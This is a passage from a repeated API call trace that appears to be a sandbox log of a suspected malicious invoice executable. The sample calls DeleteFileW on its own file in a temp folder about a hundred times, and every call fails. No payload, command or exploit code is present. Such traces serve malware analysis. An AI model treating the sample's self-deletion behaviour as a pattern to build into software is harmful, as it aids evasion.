DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.849] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.849] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.849] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.849] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.849] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.849] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.850] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.850] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.850] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.850] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.850] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.851] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.851] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.851] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.852] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.852] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.852] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.852] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.853] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.853] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.853] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.853] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.854] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.854] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.854] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.855] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.855] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.855] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.855] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.856] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.856] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.856] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.857] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.857] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.857] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.858] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.858] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.861] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.862] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.862] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.862] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.863] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.863] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.863] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.864] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.864] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.864] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.865] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.865] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.865] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.866] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.866] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.866] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.867] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.867] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.867] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.867] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.868] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.868] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.868] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.869] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.869] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.869] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.869] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.870] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.870] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.870] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.870] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.871] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.871] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.871] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.871] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.872] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.872] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.872] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.872] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.873] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.873] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.873] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.873] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.874] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.906] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.906] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.906] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.906] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.907] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.907] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.907] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.907] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.907] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.907] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.908] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.908] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.908] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.908] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.908] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.908] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.909] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.910] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: 